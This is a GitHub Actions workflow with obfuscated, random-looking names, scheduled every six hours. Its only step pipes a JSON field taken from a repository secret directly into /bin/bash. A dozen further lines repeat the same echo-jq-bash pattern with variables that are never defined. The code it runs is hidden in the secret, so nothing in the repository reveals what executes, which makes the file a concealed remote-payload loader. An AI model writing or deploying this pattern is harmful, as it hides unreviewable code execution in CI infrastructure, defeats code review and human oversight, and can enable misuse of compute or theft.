name: jixuanxc
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jixuanxc
        env:
          io846: ${{ secrets.io846 }}
        run: |
          echo $io846 | jq -r .bxsdd4 | /bin/bash
          echo $a302 | jq -r .h71463 | /bin/bash
          echo $twrb2 | jq -r .vlfne236 | /bin/bash
          echo $avy18017 | jq -r .j1882 | /bin/bash
          echo $l1642 | jq -r .bulj612 | /bin/bash
          echo $ridu8449 | jq -r .dh8 | /bin/bash
          echo $yb242 | jq -r .ykqs96838 | /bin/bash
          echo $q7 | jq -r .r89 | /bin/bash
          echo $v5 | jq -r .zbwhv4 | /bin/bash
          echo $xck174 | jq -r .od59959 | /bin/bash
          echo $b493 | jq -r .vs25 | /bin/bash
          echo $klyhl6194 | jq -r .b9 | /bin/bash
          echo $oo29206 | jq -r .res64 | /bin/bash

